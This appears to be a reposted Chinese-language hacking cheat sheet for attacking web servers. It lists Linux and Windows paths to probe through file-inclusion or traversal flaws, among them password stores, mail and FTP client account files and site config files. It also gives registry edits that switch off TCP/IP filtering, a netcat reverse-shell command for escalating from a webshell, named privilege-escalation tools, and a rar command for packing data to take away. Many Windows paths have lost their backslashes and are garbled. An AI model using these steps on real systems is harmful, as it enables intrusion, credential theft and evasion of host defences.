    /home/apache2/conf/httpd.conf
    /var/log/apache/error_log
    /var/log/apache/error.log
    /var/log/apache/access_log
    /var/log/apache/access.log
    /var/log/apache2/error_log
    /var/log/apache2/error.log
    /var/log/apache2/access_log
    /var/log/apache2/access.log
    /var/www/logs/error_log
    /var/www/logs/error.log
    /var/www/logs/access_log
    /var/www/logs/access.log
    /usr/local/apache/logs/error_log
    /usr/local/apache/logs/error.log
    /usr/local/apache/logs/access_log
    /usr/local/apache/logs/access.log
    /var/log/error_log
    /var/log/error.log
    /var/log/access_log
    /var/log/access.log
    /usr/local/apache/logs/access_logaccess_log.old
    /usr/local/apache/logs/error_logerror_log.old
    /etc/php.ini
    /bin/php.ini
    /etc/init.d/httpd
    /etc/init.d/mysql
    /etc/httpd/php.ini
    /usr/lib/php.ini
    /usr/lib/php/php.ini
    /usr/local/etc/php.ini
    /usr/local/lib/php.ini
    /usr/local/php/lib/php.ini
    /usr/local/php4/lib/php.ini
    /usr/local/php4/php.ini
    /usr/local/php4/lib/php.ini
    /usr/local/php5/lib/php.ini
    /usr/local/php5/etc/php.ini
    /usr/local/php5/php5.ini
    /usr/local/apache/conf/php.ini
    /usr/local/apache/conf/httpd.conf
    /usr/local/apache2/conf/httpd.conf
    /usr/local/apache2/conf/php.ini
    /etc/php4.4/fcgi/php.ini
    /etc/php4/apache/php.ini
    /etc/php4/apache2/php.ini
    /etc/php5/apache/php.ini
    /etc/php5/apache2/php.ini
    /etc/php/php.ini
    /etc/php/php4/php.ini
    /etc/php/apache/php.ini
    /etc/php/apache2/php.ini
    /web/conf/php.ini
    /usr/local/Zend/etc/php.ini
    /opt/xampp/etc/php.ini
    /var/local/www/conf/php.ini
    /var/local/www/conf/httpd.conf
    /etc/php/cgi/php.ini
    /etc/php4/cgi/php.ini
    /etc/php5/cgi/php.ini
    /php5/php.ini
    /php4/php.ini
    /php/php.ini
    /PHP/php.ini
    /apache/php/php.ini
    /xampp/apache/bin/php.ini
    /xampp/apache/conf/httpd.conf
    /NetServer/bin/stable/apache/php.ini
    /home2/bin/stable/apache/php.ini
    /home/bin/stable/apache/php.ini
    /var/log/mysql/mysql-bin.log
    /var/log/mysql.log
    /var/log/mysqlderror.log
    /var/log/mysql/mysql.log
    /var/log/mysql/mysql-slow.log
    /var/mysql.log
    /var/lib/mysql/my.cnf
    /usr/local/mysql/my.cnf
    /usr/local/mysql/bin/mysql
    /etc/mysql/my.cnf
    /etc/my.cnf
    /usr/local/cpanel/logs
    /usr/local/cpanel/logs/stats_log
    /usr/local/cpanel/logs/access_log
    /usr/local/cpanel/logs/error_log
    /usr/local/cpanel/logs/license_log
    /usr/local/cpanel/logs/login_log
    /usr/local/cpanel/logs/stats_log
    /usr/local/share/examples/php4/php.ini
    /usr/local/share/examples/php/php.ini
    /usr/local/tomcat5527/bin/version.sh
    /usr/share/tomcat6/bin/startup.sh
    /usr/tomcat6/bin/startup.sh

    Windows 系统下的一些常见路径(可以将c盘换成d,e盘,比如星外虚拟主机跟华众得,一般都放在d盘):
    c:windowsphp.ini
    c:oot.ini
    c:1.txt
    c:a.txt

    c:CMailServerconfig.ini
    c:CMailServerCMailServer.exe
    c:CMailServerWebMailindex.asp
    c:program filesCMailServerCMailServer.exe
    c:program filesCMailServerWebMailindex.asp
    C:WinWebMailSysInfo.ini
    C:WinWebMailWebdefault.asp
    C:WINDOWSFreeHost32.dll
    C:WINDOWS7i24iislog4.exe
    C:WINDOWS7i24tool.exe

    c:hzhostdatabasesurl.asp

    c:hzhosthzclient.exe
    C:Documents and SettingsAll Users「开始」菜单程序7i24虚拟主机管理平台自动设置[受控端].lnk

    C:Documents and SettingsAll Users「开始」菜单程序Serv-UServ-U Administrator.lnk
    C:WINDOWSweb.config
    c:webindex.html
    c:wwwindex.html
    c:WWWROOTindex.html
    c:websiteindex.html
    c:webindex.asp
    c:wwwindex.asp
    c:wwwsiteindex.asp
    c:WWWROOTindex.asp
    c:webindex.php
    c:wwwindex.php
    c:WWWROOTindex.php
    c:WWWsiteindex.php
    c:webdefault.html
    c:wwwdefault.html
    c:WWWROOTdefault.html
    c:websitedefault.html
    c:webdefault.asp
    c:wwwdefault.asp
    c:wwwsitedefault.asp
    c:WWWROOTdefault.asp
    c:webdefault.php
    c:wwwdefault.php
    c:WWWROOTdefault.php
    c:WWWsitedefault.php
    C:Inetpubwwwrootpagerror.gif
    c:windows otepad.exe
    c:winnt otepad.exe
    C:Program FilesMicrosoft OfficeOFFICE10winword.exe
    C:Program FilesMicrosoft OfficeOFFICE11winword.exe
    C:Program FilesMicrosoft OfficeOFFICE12winword.exe
    C:Program FilesInternet ExplorerIEXPLORE.EXE
    C:Program Fileswinrar ar.exe
    C:Program Files360360Safe360safe.exe
    C:Program Files360Safe360safe.exe
    C:Documents and SettingsAdministratorApplication Data360Safe360Examine360Examine.log
    c: avbinstore.ini
    c: ising.ini
    C:Program FilesRisingRavRsTask.xml
    C:Documents and SettingsAll UsersStart Menudesktop.ini
    C:Documents and SettingsAdministratorMy DocumentsDefault.rdp
    C:Documents and SettingsAdministratorCookiesindex.dat
    C:Documents and SettingsAdministratorMy Documents新建 文本文档.txt
    C:Documents and SettingsAdministrator桌面新建 文本文档.txt
    C:Documents and SettingsAdministratorMy Documents1.txt
    C:Documents and SettingsAdministrator桌面1.txt
    C:Documents and SettingsAdministratorMy Documentsa.txt
    C:Documents and SettingsAdministrator桌面a.txt
    C:Documents and SettingsAll UsersDocumentsMy PicturesSample PicturesBlue hills.jpg
    E:Inetpubwwwrootaspnet_clientsystem_web1_1_4322SmartNav.htm
    C:Program FilesRhinoSoft.comServ-UVersion.txt
    C:Program FilesRhinoSoft.comServ-UServUDaemon.ini
    C:Program FilesSymantecSYMEVENT.INF
    C:Program FilesMicrosoft SQL Server80ToolsBinnsqlmangr.exe
    C:Program FilesMicrosoft SQL ServerMSSQLDatamaster.mdf
    C:Program FilesMicrosoft SQL ServerMSSQL.1MSSQLDatamaster.mdf
    C:Program FilesMicrosoft SQL ServerMSSQL.2MSSQLDatamaster.mdf
    C:Program FilesMicrosoft SQL Server80ToolsHTMLdatabase.htm
    C:Program FilesMicrosoft SQL ServerMSSQLREADME.TXT
    C:Program FilesMicrosoft SQL Server90ToolsBinDdsShapes.dll
    C:Program FilesMicrosoft SQL ServerMSSQLsqlsunin.ini
    C:MySQLMySQL Server 5.0my.ini
    C:Program FilesMySQLMySQL Server 5.0my.ini
    C:Program FilesMySQLMySQL Server 5.0datamysqluser.frm
    C:Program FilesMySQLMySQL Server 5.0COPYING
    C:Program FilesMySQLMySQL Server 5.0sharemysql_fix_privilege_tables.sql
    C:Program FilesMySQLMySQL Server 4.1inmysql.exe
    c:MySQLMySQL Server 4.1inmysql.exe
    c:MySQLMySQL Server 4.1datamysqluser.frm
    C:Program FilesOracleoraconfigLpk.dll
    C:WINDOWSMicrosoft.NETFrameworkv2.0.50727aspnet_state.exe
    C:WINDOWSsystem32inetsrvw3wp.exe
    C:WINDOWSsystem32inetsrvinetinfo.exe
    C:WINDOWSsystem32inetsrvMetaBase.xml
    C:WINDOWSsystem32inetsrviisa, dmpwdachg.asp
    C:WINDOWSsystem32configdefault.LOG
    C:WINDOWSsystem32configsam
    C:WINDOWSsystem32configsystem
    c:CMailServerconfig.ini
    c:program filesCMailServerconfig.ini
    c: omcat6 omcat6inversion.sh
    c: omcat6inversion.sh
    c: omcatinversion.sh
    c:program files omcat6inversion.sh
    C:Program FilesApache Software FoundationTomcat 6.0inversion.sh
    c:Program FilesApache Software FoundationTomcat 6.0logsisapi_redirect.log
    c:Apache2Apache2inApache.exe
    c:Apache2inApache.exe
    c:Apache2phplicense.txt
    C:Program FilesApache GroupApache2inApache.exe
    c:Program FilesQQ2007qq.exe
    c:Program FilesTencent\, qqUser.db
    c:Program FilesTencentqqqq.exe
    c:Program FilesTencentqqinqq.exe
    c:Program FilesTencentqq2009qq.exe
    c:Program FilesTencentqq2008qq.exe
    c:Program FilesTencentqq2010inqq.exe
    c:Program FilesTencentqqUsersAll UsersRegistry.db
    C:Program FilesTencentTMTMDllsQQZip.dll
    c:Program FilesTencentTmBinTxplatform.exe
    c:Program FilesTencentRTXServerAppConfig.xml
    C:Program FilesFoxmalFoxmail.exe
    C:Program FilesFoxmalaccounts.cfg
    C:Program Files encentFoxmalFoxmail.exe
    C:Program Files encentFoxmalaccounts.cfg
    C:Program FilesLeapFTP 3.0LeapFTP.exe
    C:Program FilesLeapFTPLeapFTP.exe
    c:Program FilesGlobalSCAPECuteFTP Procftppro.exe
    c:Program FilesGlobalSCAPECuteFTP Pro otes.txt
    C:Program FilesFlashFXPFlashFXP.ini
    C:Program FilesFlashFXPflashfxp.exe
    c:Program FilesOraclein egsvr32.exe
    c:Program Files腾讯游戏QQGAME eadme.txt
    c:Program Files encent腾讯游戏QQGAME eadme.txt
    c:Program Files encentQQGAME eadme.txt
    C:Program FilesStormIIStorm.exe

    各种网站的配置文件相对路径大全:
    /config.php
    ../../config.php
    ../config.php
    ../../../config.php
    /config.inc.php
    ./config.inc.php
    ../../config.inc.php
    ../config.inc.php
    ../../../config.inc.php
    /conn.php
    ./conn.php
    ../../conn.php
    ../conn.php
    ../../../conn.php
    /conn.asp
    ./conn.asp
    ../../conn.asp
    ../conn.asp
    ../../../conn.asp
    /config.inc.php
    ./config.inc.php
    ../../config.inc.php
    ../config.inc.php
    ../../../config.inc.php
    /config/config.php
    ../../config/config.php
    ../config/config.php
    ../../../config/config.php
    /config/config.inc.php
    ./config/config.inc.php
    ../../config/config.inc.php
    ../config/config.inc.php
    ../../../config/config.inc.php
    /config/conn.php
    ./config/conn.php
    ../../config/conn.php
    ../config/conn.php
    ../../../config/conn.php
    /config/conn.asp
    ./config/conn.asp
    ../../config/conn.asp
    ../config/conn.asp
    ../../../config/conn.asp
    /config/config.inc.php
    ./config/config.inc.php
    ../../config/config.inc.php
    ../config/config.inc.php
    ../../../config/config.inc.php
    /data/config.php
    ../../data/config.php
    ../data/config.php
    ../../../data/config.php
    /data/config.inc.php
    ./data/config.inc.php
    ../../data/config.inc.php
    ../data/config.inc.php
    ../../../data/config.inc.php
    /data/conn.php
    ./data/conn.php
    ../../data/conn.php
    ../data/conn.php
    ../../../data/conn.php
    /data/conn.asp
    ./data/conn.asp
    ../../data/conn.asp
    ../data/conn.asp
    ../../../data/conn.asp
    /data/config.inc.php
    ./data/config.inc.php
    ../../data/config.inc.php
    ../data/config.inc.php
    ../../../data/config.inc.php
    /include/config.php
    ../../include/config.php
    ../include/config.php
    ../../../include/config.php
    /include/config.inc.php
    ./include/config.inc.php
    ../../include/config.inc.php
    ../include/config.inc.php
    ../../../include/config.inc.php
    /include/conn.php
    ./include/conn.php
    ../../include/conn.php
    ../include/conn.php
    ../../../include/conn.php
    /include/conn.asp
    ./include/conn.asp
    ../../include/conn.asp
    ../include/conn.asp
    ../../../include/conn.asp
    /include/config.inc.php
    ./include/config.inc.php
    ../../include/config.inc.php
    ../include/config.inc.php
    ../../../include/config.inc.php
    /inc/config.php
    ../../inc/config.php
    ../inc/config.php
    ../../../inc/config.php
    /inc/config.inc.php
    ./inc/config.inc.php
    ../../inc/config.inc.php
    ../inc/config.inc.php
    ../../../inc/config.inc.php
    /inc/conn.php
    ./inc/conn.php
    ../../inc/conn.php
    ../inc/conn.php
    ../../../inc/conn.php
    /inc/conn.asp
    ./inc/conn.asp
    ../../inc/conn.asp
    ../inc/conn.asp
    ../../../inc/conn.asp
    /inc/config.inc.php
    ./inc/config.inc.php
    ../../inc/config.inc.php
    ../inc/config.inc.php
    ../../../inc/config.inc.php
    /index.php
    ./index.php
    ../../index.php
    ../index.php
    ../../../index.php
    /index.asp
    ./index.asp
    ../../index.asp
    ../index.asp
    ../../../index.asp

    去除TCP IP筛选:
    TCP/IP筛选在注册表里有三处,分别是:

    HKEY_LOCAL_MACHINESYSTEMControlSet001ServicesTcpip
    HKEY_LOCAL_MACHINESYSTEMControlSet002ServicesTcpip
    HKEY_LOCAL_MACHINESYSTEMCurrentControlSetServicesTcpip

    分别用以下命令来导出注册表项:
    regedit -e D:a.reg HKEY_LOCAL_MACHINESYSTEMCurrentControlSetServicesTcpip
    regedit -e D:.reg HKEY_LOCAL_MACHINESYSTEMControlSet002ServicesTcpip
    regedit -e D:c.reg HKEY_LOCAL_MACHINESYSTEMCurrentControlSetServicesTcpip
    然后再把三个文件里的:

    “EnableSecurityFilters”=dword:00000001”

    改为:

    “EnableSecurityFilters”=dword:00000000”

    再将以上三个文件分别用以下命令导入注册表即可:
    regedit -s D:a.reg
    regedit -s D:.reg
    regedit -s D:c.reg

    Webshell 提权小技巧:
    Cmd路径:c:windows empcmd.exe

    Nc 也在同目录下,例如反弹cmdshell:

    “c:windows emp c.exe -vv ip 999 -e c:windows empcmd.exe”

    通常都不会成功。

    而直接在 cmd 路径上输入:c:windows emp c.exe

    命令输入:-vv ip 999 -e c:windows empcmd.exe

    却能成功。。这个不是重点
    我们通常执行 pr.exe 或 Churrasco.exe 的时候也需要按照上面的方法才能成功。

    命令行调用 RAR 打包:
    rar a -k -r -s -m3 c:1.rar c:folder

    原文链接:http://cracer.com/?p=1241

  • 相关阅读:
    hdoj 3599 最小费用最大流
    poj 2516 最小费用最大流
    poj 3281 最大流拆点
    poj 3436 网络最大流加打印路径
    邻接表模板
    hdu 2102 搜索
    hdoj 1533 最小费用最大流
    HDU 1231 最大连续子序列
    NYOJ 2 括号配对问题
    POJ 1163 / NYOJ 16 The Triangle(数字三角形)
  • 原文地址:https://www.cnblogs.com/studyone/p/5433603.html
Copyright © 2020-2023  润新知